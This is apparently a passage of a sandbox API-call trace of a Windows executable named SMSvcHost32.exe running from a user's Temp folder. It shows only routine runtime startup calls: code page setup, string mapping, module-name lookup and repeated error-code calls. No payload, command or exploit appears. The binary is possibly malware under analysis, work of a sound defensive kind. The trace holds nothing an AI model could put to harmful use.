	[0083.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1635, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1635
	[0083.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=::=::\\", cchWideChar=1635, lpMultiByteStr=0x31a26b0, cbMultiByte=1635, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=::=::\\", lpUsedDefaultChar=0x0) returned 1635
	[0083.595] FreeEnvironmentStringsW (penv=0x31a59c0) returned 1
	[0083.595] GetStartupInfoW (in: lpStartupInfo=0x203fc0c | out: lpStartupInfo=0x203fc0c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x89a14c87, hStdOutput=0x203fc80, hStdError=0x4db3155)) 
	[0083.595] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0083.595] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0083.595] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0083.595] GetLastError () returned 0x7f
	[0083.595] SetLastError (dwErrCode=0x7f) 
	[0083.595] GetLastError () returned 0x7f
	[0083.595] SetLastError (dwErrCode=0x7f) 
	[0083.595] GetLastError () returned 0x7f
	[0083.596] SetLastError (dwErrCode=0x7f) 
	[0083.596] GetACP () returned 0x4e4
	[0083.596] GetLastError () returned 0x7f
	[0083.596] SetLastError (dwErrCode=0x7f) 
	[0083.596] IsValidCodePage (CodePage=0x4e4) returned 1
	[0083.596] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x203fc10 | out: lpCPInfo=0x203fc10) returned 1
	[0083.596] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x203f6d8 | out: lpCPInfo=0x203f6d8) returned 1
	[0083.596] GetLastError () returned 0x7f
	[0083.596] SetLastError (dwErrCode=0x7f) 
	[0083.596] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x203faec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0083.596] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x203faec, cbMultiByte=256, lpWideCharStr=0x203f458, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᤝӛĀ") returned 256
	[0083.596] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᤝӛĀ", cchSrc=256, lpCharType=0x203f6ec | out: lpCharType=0x203f6ec) returned 1
	[0083.596] GetLastError () returned 0x7f
	[0083.596] SetLastError (dwErrCode=0x7f) 
	[0083.596] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x203faec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0083.596] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x203faec, cbMultiByte=256, lpWideCharStr=0x203f428, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᜅӛĀ") returned 256
	[0083.596] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᜅӛĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0083.596] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᜅӛĀ", cchSrc=256, lpDestStr=0x203f218, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256
	[0083.596] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x203f9ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x24\x4a\xee\x94\x28\xfc\x03\x02\x82\xbd\xda\x04", lpUsedDefaultChar=0x0) returned 256
	[0083.596] GetLastError () returned 0x7f
	[0083.596] SetLastError (dwErrCode=0x7f) 
	[0083.596] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x203faec, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0083.596] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x203faec, cbMultiByte=256, lpWideCharStr=0x203f448, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0083.596] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0083.596] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x203f238, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256
	[0083.596] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x203f8ec, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x24\x4a\xee\x94\x28\xfc\x03\x02\x82\xbd\xda\x04", lpUsedDefaultChar=0x0) returned 256
	[0083.596] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4fa6040, nSize=0x104 | out: lpFilename="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\temp\\smsvchost32.exe")) returned 0x34
	[0083.596] GetLastError () returned 0x0
	[0083.596] SetLastError (dwErrCode=0x0) 
	[0083.596] GetLastError () returned 0x0
	[0083.596] SetLastError (dwErrCode=0x0) 
	[0083.596] GetLastError () returned 0x0
	[0083.596] SetLastError (dwErrCode=0x0) 
	[0083.596] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.597] GetLastError () returned 0x0
	[0083.597] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.598] GetLastError () returned 0x0
	[0083.598] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
	[0083.599] SetLastError (dwErrCode=0x0) 
	[0083.599] GetLastError () returned 0x0
